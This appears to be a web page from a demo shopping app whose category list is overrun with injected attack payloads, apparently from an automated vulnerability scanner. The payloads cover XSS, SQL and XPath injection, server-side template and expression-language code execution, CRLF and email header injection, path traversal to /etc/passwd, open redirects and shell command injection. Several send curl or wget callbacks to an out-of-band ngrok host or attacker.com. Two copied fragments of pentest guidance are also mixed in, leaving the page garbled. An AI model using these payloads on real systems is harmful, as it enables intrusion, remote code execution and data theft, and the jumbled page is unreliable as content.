FoxShopping

Allow
Clothes
Technology
Furniture
Shoes
Miscellaneous
New category
=DDE("cmd","/c calc","")
victim@test.com%0aCc:attacker@evil.com
victim@test.com%0aBcc:attacker@evil.com
Updated Category
victim@test.com%0d%0aBcc:attacker@evil.com
victim@test.com\nCc:attacker@evil.com
victim@test.com\r\nBcc:attacker@evil.com
victim@test.com Subject:Phishing Email
victim@test.com%0aSubject:URGENT-Password Reset
admin%0d%0a[INFO] User logged in successfully
victim@test.com%0aContent-Type:text/html
test\n[CRITICAL] System compromised
victim@test.com%0a%0a<html><body>Phishing content</body></html>
${jndi:ldap://attacker.com/a}
victim@test.com%0aFrom:admin@legitimate.com
invalid_test_value_xyz_12345
victim@test.com%0aX-Mailer:EvilMailer
victim@test.com%0aReturn-Path:attacker@evil.com
victim@test.com%0aMIME-Version:1.0%0aContent-Type:multipart/mixed;boundary=evil
victim@test.com%0a--evil%0aContent-Type:text/html%0a%0a<script>alert(1)</script>%0a--evil--
victim@test.com%0aContent-Transfer-Encoding:base64
victim@test.com%0aContent-Disposition:attachment;filename=evil.exe
"victim@test.com Cc:attacker@evil.com"
victim@test.com%00attacker@evil.com
victim@test.com%0aX-Priority:1
victim@test.com%0aImportance:high
victim@test.com%0aDisposition-Notification-To:attacker@evil.com
victim@test.com%0aList-Unsubscribe:<http://attacker.com>
victim@test.com%0aX-Originating-IP:127.0.0.1
victim@test.com%0aReceived:from attacker.com
victim@test.com%0aMessage-ID:<evil@attacker.com>
victim@test.com%0aDate:Mon,01Jan200100:00:00+0000
victim@test.com%0aIn-Reply-To:<original@legitimate.com>
аdmin
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C/script%253E
<script>alert(1)</script>
<script>alert(1)</script>
\x3Cscript\x3Ealert(1)\x3C/script\x3E
%c0%bc%c0%bc%c0%bcscript%c0%be
JTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNF
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
' AND 1=1--
%27%20AND%201=1--
' AN%44 1=1--
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<script/src=data:,alert(1)>
java%00script:alert(1)
javascript:alert(1)
\74script\76alert(1)\74/script\76
' OR '1'='1
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
\u003Cscript\u003Ealert(1)\u003C/script\u003E
; cat /etc/passwd
<svg/onload=alert(1)>
{{7*7}}
jav	ascript:alert(1)
jav
ascript:alert(1)
[object Object]
../../../etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%255c..%255c..%255cwindows/win.ini
<svg><style><img src=x onerror=alert('mxsse8408139')>
normalvalue123
{"$gt": undefined}
normaltext123
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}
{{config}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
${"freemarker.template.utility.Execute"?new()("id")}
[[${T(java.lang.Runtime).getRuntime().exec('id')}]]
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
$class.inspect('java.lang.Runtime').type.getRuntime().exec('id')
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
{{self.__init__.__globals__.__builtins__['eval']('__import__("os").popen("id").read()')}}
{{lipsum.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{url_for.__globals__['os'].popen('id').read()}}
{{get_flashed_messages.__globals__['os'].popen('id').read()}}
{{191*53}}
{{3847*2963}}
a]{{7*7}}
${{<%[%'"}}%\.
{{dump(app)}}
{"$gt": ""}
{% import os %}{{ os.popen("curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti").read() }}
${"https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"?url?content}
#set($x="")#set($rt=$x.class.forName("java.lang.Runtime"))#set($chr=$x.class.forName("java.lang.Character"))#set($str=$x.class.forName("java.lang.String"))#set($ex=$rt.getRuntime().exec("curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"))$ex.waitFor()
{{["curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"]|filter("system")}}
<%= `curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti` %>
test%0d%0aSet-Cookie:session=malicious
test%0d%0aX-Injected:true
test%0aSet-Cookie:session=malicious
test\r\nSet-Cookie:pwned=1
test%E5%98%8A%E5%98%8DSet-Cookie:test=1
test%0d%0aLocation:https://attacker.com
testX-Forwarded-For: 127.0.0.1
testX-Forwarded-Host: attacker.com
testX-Original-URL: /admin
testHost: attacker.com
test%0d%0aAccess-Control-Allow-Origin:*
testX-HTTP-Method-Override: DELETE
test%0d%0aTransfer-Encoding:chunked
test/%%0a0aSet-Cookie:crlf=injection
test/%0aSet-Cookie:crlf=injection
test/%0d%0aSet-Cookie:crlf=injection
test/%0dSet-Cookie:crlf=injection
test/%23%0aSet-Cookie:crlf=injection
test/%23%0d%0aSet-Cookie:crlf=injection
test/%23%0dSet-Cookie:crlf=injection
test/%25%30%61Set-Cookie:crlf=injection
test/%25%30aSet-Cookie:crlf=injection
test/%250aSet-Cookie:crlf=injection
test/%25250aSet-Cookie:crlf=injection
test/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
test/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
test/%2F..%0d%0aSet-Cookie:crlf=injection
test/%3f%0d%0aSet-Cookie:crlf=injection
test/%3f%0dSet-Cookie:crlf=injection
test/%u000aSet-Cookie:crlf=injection
testHost: evil.com
testX-Forwarded-Host: evil.com
testX-Forwarded-For: 127.0.0.1 X-Injected-Header: evil
testReferer: javascript:alert(1)
testUser-Agent: <script>alert(1)</script>
testX-Original-URL: /admin/dashboard
testX-Rewrite-URL: /admin
testX-Custom-IP-Authorization: 127.0.0.1
testHost: localhost Host: target.com
testX-Forwarded-Proto: http
testConnection: keep-alive Transfer-Encoding: chunked
testAccept-Language: en Set-Cookie: admin=true
testX-Debug: true
testX-Forwarded-Port: 443 X-Forwarded-Scheme: https
testVia: 1.1 evil-proxy
<script>alert('xss40530d4e')</script>
<img src=x onerror=alert('SO2ND_xss_cfa56d45'+1)>
${applicationScope}
${sessionScope}
${requestScope}
${pageContext}
${pageContext.request.serverName}
${pageContext.request.contextPath}
${pageContext.servletContext.classLoader}
${T(java.lang.System).getenv()}
${T(java.lang.System).getProperty('user.dir')}
#{T(java.lang.Runtime).getRuntime().exec('whoami')}
${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
%{(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())}
${#this.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('id')}
${request.getClass().getClassLoader().loadClass('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id')}
#{request.getClass().getClassLoader().loadClass('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['id']).start()}
${facesContext.getExternalContext().getRequest()}
#{facesContext.getExternalContext().getResponse().getWriter().write('INJECTED')}
${T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get('/etc/passwd'))}
${T(java.nio.file.Files).write(T(java.nio.file.Paths).get('/tmp/pwned'),'pwned'.getBytes())}
${T(java.net.InetAddress).getLocalHost().getHostName()}
${T(java.lang.Thread).currentThread().getContextClassLoader().getResource('')}
${T(org.springframework.util.StreamUtils).copyToString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream(),T(java.nio.charset.Charset).forName('UTF-8'))}
#{session.setAttribute('admin',true)}
${param.cmd.getClass().forName('java.lang.Runtime').getRuntime().exec(param.cmd)}
${header['user-agent'].getClass().forName('java.lang.Runtime')}
${cookie.JSESSIONID.value}
${initParam}
${pageContext.request.getSession().getAttribute('user')}
#{bean.getClass().getProtectionDomain().getCodeSource().getLocation()}
${T(java.lang.Class).forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')}
${#a=new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}
#{messages[''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')]}
${T(javax.naming.InitialContext).doLookup('ldap://attacker.com/a')}
${T(java.sql.DriverManager).getConnection('jdbc:mysql://attacker.com/db')}
' or ''='
#{request.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('id')}
x' or name()='username' or 'x'='y
'] | //user/*[contains(*,'
${sessionScope.user.password}
' and count(/*)=1 and 'a'='a
${header['authorization']}
' and string-length(name(/*[1]))=4 and 'a'='a
#{facesContext.getExternalContext().getRequestParameterMap()}
${request.getServletContext().getRealPath('/')}
' and substring(name(/*[1]),1,1)='n' and 'a'='a
x]|//*[
' or 1=1 or ''='
admin' or '1'='1' or 'x'='y
x']//password | a]
x]/*[1]
' or contains(.,'admin')
1. Size of a string
2. Access a character with `substring`, and verify its value the `codepoints-to-string` function
ps1 string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
sql substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
powershell http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
' and '
1' or '1
invalid_function()
' or invalid()='
' or 1=string('a')='
' or number('x')=1 or '
' or //*[namespace-uri()='http://test']='
' or exists(//*) or '
' or doc('http://evil.com')='
' or '1'='2
' or 1=2 or '
1 or 1=1
1 or 1=2
' or 'a'='a
' or 'a'='b
' or string-length('a')=1 or '
' or string-length('a')=2 or '
' or count(/*)>0 or '
' or count(/*)>999999 or '
' or //* or '
' or /nonexistent or '
' or position()=1 or '
' or position()=999999 or '
' or name()!='' or '
' or name()='nonexistent' or '
New category' or '1'='1
New category' or '1'='2
admin' or '1'='1' or 'x'='
admin' or '1'='2' or 'x'='
' or true() or '
' or false() or '
' or exists(/nonexistent) or '
' or doc('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
1) or doc('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f') or (1
' or unparsed-text('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
' or saxon:parse('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
//attacker.com
https://target.com@attacker.com
javascript:alert(1)
data:text/html,<script>alert(1)</script>
https:attacker.com
https://targetcom.attacker.com
%2f%2fattacker.com
https://аttacker.com
https://127.0.0.1
https://169.254.169.254
file:///etc/passwd
gopher://attacker.com
dict://attacker.com
An attacker could exploit an open redirect here by replacing the `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they're taken to the malicious website.
HTTP Redirection status codes, those starting with 3, indicate that the client must take additional action to complete the request. Here are some of the most common ones:
* [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
* [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
* [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
* [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
* [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
* [305 Use Proxy](https://httpstatuses.com/305) - The requested resource must be accessed through a proxy provided in the Location header.
* [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
* [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
Instead of query parameters, redirection logic may rely on the path:
* Using slashes in URLs: `https://example.com/redirect/http://malicious.com`
//evil.com
https:evil.com
//evil.com%00.trusted.com
https://attacker.com#@target.com
//attacker.com/%2f..
/%09/attacker.com
/%0d/attacker.com
/%0a/attacker.com
rfd_test_marker
;whoami
| dir
& type C:\Windows\win.ini
;sleep 5
& ping -n 5 127.0.0.1
;ping -c 5 127.0.0.1
;curl http://attacker.com/?x=$(whoami)
;wget http://attacker.com/?x=$(id)
|nslookup attacker.com
%0aid
%0awhoami
a]|id
;/???/??t /???/p??s??
;/???/b??/w?o?m?
;$'\x69\x64'
;$(printf '\x69\x64')
;i]d
${IFS}id
;id${IFS}
;cat$IFS/etc/passwd
| bash -c 'id'
| sh -c 'id'
| powershell -c whoami
;rev<<<'di'|bash
;base64 -d<<<'aWQ='|bash
1
; curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/bd24c64c40cf660dada9/cmdi #
; wget -q https://uncloyed-eden-soughfully.ngrok-free.dev/i/bd24c64c40cf660dada9/cmdi -O /dev/null #
& nslookup uncloyed-eden-soughfully.ngrok-free.dev &
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT NULL,NULL,NULL,NULL--
1' AND '1'='1
1' AND '1'='2
1' AND '1'='2 AND 1=0
; id #;echo SO2ND_command_injection_599f91a7;
' OR '1'='1/*SO2ND_sqli_edbc96e3*/
; curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce #
; wget -q https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce -O /dev/null #
__import__('os').popen('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce').read()
require('child_process').execSync('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce')
<?php system('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce'); ?>
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('exec')}}
<?php system('id'); ?>
<?php exec('id'); ?>
<?php passthru('id'); ?>
<?php shell_exec('id'); ?>
<?php popen('id', 'r'); ?>
<?php proc_open('id', [], $pipes); ?>
<?php pcntl_exec('/bin/sh', ['-c', 'id']); ?>
test%0d%0a%0d%0aX-Injected:header: injected
Kategori lama
New Ctg
category_B
Nueva Categoria TF
Testing Category
Gaming Gear

Ingresar

init